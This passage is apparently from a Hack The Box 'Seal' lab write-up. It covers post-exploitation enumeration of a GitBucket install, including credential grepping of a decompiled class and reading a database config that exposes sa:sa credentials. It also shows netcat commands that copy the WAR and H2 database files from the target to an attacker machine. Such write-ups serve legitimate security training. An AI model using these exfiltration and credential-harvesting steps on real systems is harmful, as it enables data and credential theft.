GitBucket
/bin/sh -c java -jar /home/luis/gitbucket.war
According to the process enumeration that I made earlier, the GitBucket instance is running with the privileges of the luis user
tomcat@seal:/home/luis$ nc 10.10.14.7 2222 < gitbucket.war
┌──(kali㉿kali)-[~/archive/htb/labs/seal]
└─$ nnc 2222 > gitbucket.war
listening on [any] 2222 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.250] 56024I moved the WAR file to Kali for in-depth analysis
┌──(kali㉿kali)-[~/…/htb/labs/seal/gitbucket]
└─$ jar -xvf gitbucket.war
picked up _java_options: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
inflated: META-INF/MANIFEST.MF
[...REDACTED...]Then I extracted the content
┌──(kali㉿kali)-[~/…/htb/labs/seal/gitbucket]
└─$ ls
assets gitbucket.war javax JettyLauncher.class META-INF org WEB-INFassets: This directory typically contains static files such as images, stylesheets, and JavaScript files that are served by the web application.javax: This directory contains Java EE API classes and interfaces that the web application may use.jettylauncher.class: This is a compiled Java class file that may be used to start the Jetty web server.meta-inf: This directory typically contains metadata files for the web application, such as the MANIFEST.MF file.org: This directory typically contains Java class files for the web application, organized according to the package structure of the application.web-inf: This directory contains configuration files and classes that are specific to the web application. Specifically, theclassessubdirectory contains compiled Java classes for the application, and thelibsubdirectory contains third-party JAR files that the application depends on.
I went through pretty much all of them without finding anything
┌──(kali㉿kali)-[~/…/htb/labs/seal/gitbucket]
└─$ javap -c -p -s -v JettyLauncher.class | egrep -i "*passw*|*sql*|*user*|crede*"
grep: warning: * at start of expression
grep: warning: * at start of expression
grep: warning: * at start of expression
picked up _java_options: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
#101 = String #245 // user.home
#245 = Utf8 user.home
56: ldc #101 // String user.homeI decompiled Java class file to see if it contains any credential, but no luck
So the WAR file itself had not much going on
But I found the .gitbucket directory at the home directory of the luis user as well
.gitbucket
tomcat@seal:/home/luis$ ll .gitbucket
total 120K
4.0K drwxrwxr-x 3 luis luis 4.0K Apr 11 14:29 plugins
80K -rw-rw-r-- 1 luis luis 80K Apr 11 14:29 data.mv.db
4.0K drwxrwxr-x 3 luis luis 4.0K Apr 11 14:29 tmp
4.0K drwxrwxr-x 6 luis luis 4.0K Apr 11 14:29 .
4.0K drwxr-xr-x 9 luis luis 4.0K May 7 2021 ..
8.0K -rw-rw-r-- 1 luis luis 5.6K May 6 2021 activity.log
4.0K -rw-rw-r-- 1 luis luis 673 May 5 2021 gitbucket.conf
4.0K drwxrwxr-x 3 luis luis 4.0K May 5 2021 repositories
4.0K drwxrwxr-x 2 luis luis 4.0K May 5 2021 gist
4.0K -rw-rw-r-- 1 luis luis 205 May 5 2021 database.confI can see that the directory contains the DB file as well as the configuration file for it
tomcat@seal:/home/luis/.gitbucket$ cat database.conf
db {
url = "jdbc:h2:${DatabaseHome};MVCC=true"
user = "sa"
password = "sa"
# connectionTimeout = 30000
# idleTimeout = 600000
# maxLifetime = 1800000
# minimumIdle = 10
# maximumPoolSize = 10The DB configuration file contains the DB credential; sa:sa
The jdbc:h2: specifies the driver and protocol for connecting to a H2 database, followed by the location of the database files, which in this case is ${DatabaseHome}.
The MVCC=true option enables multi-version concurrency control.
tomcat@seal:/home/luis/.gitbucket$ nc 10.10.14.7 2222 < data.mv.db
┌──(kali㉿kali)-[~/…/labs/seal/gitbucket/.gitbucket]
└─$ nnc 2222 > data.mv.db
listening on [any] 2222 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.250] 56028While I was struggling to open up this H2 database via web-based tool because I don’t want downloading & installing a 3rd-party tool, I found an attack vector for lateral movement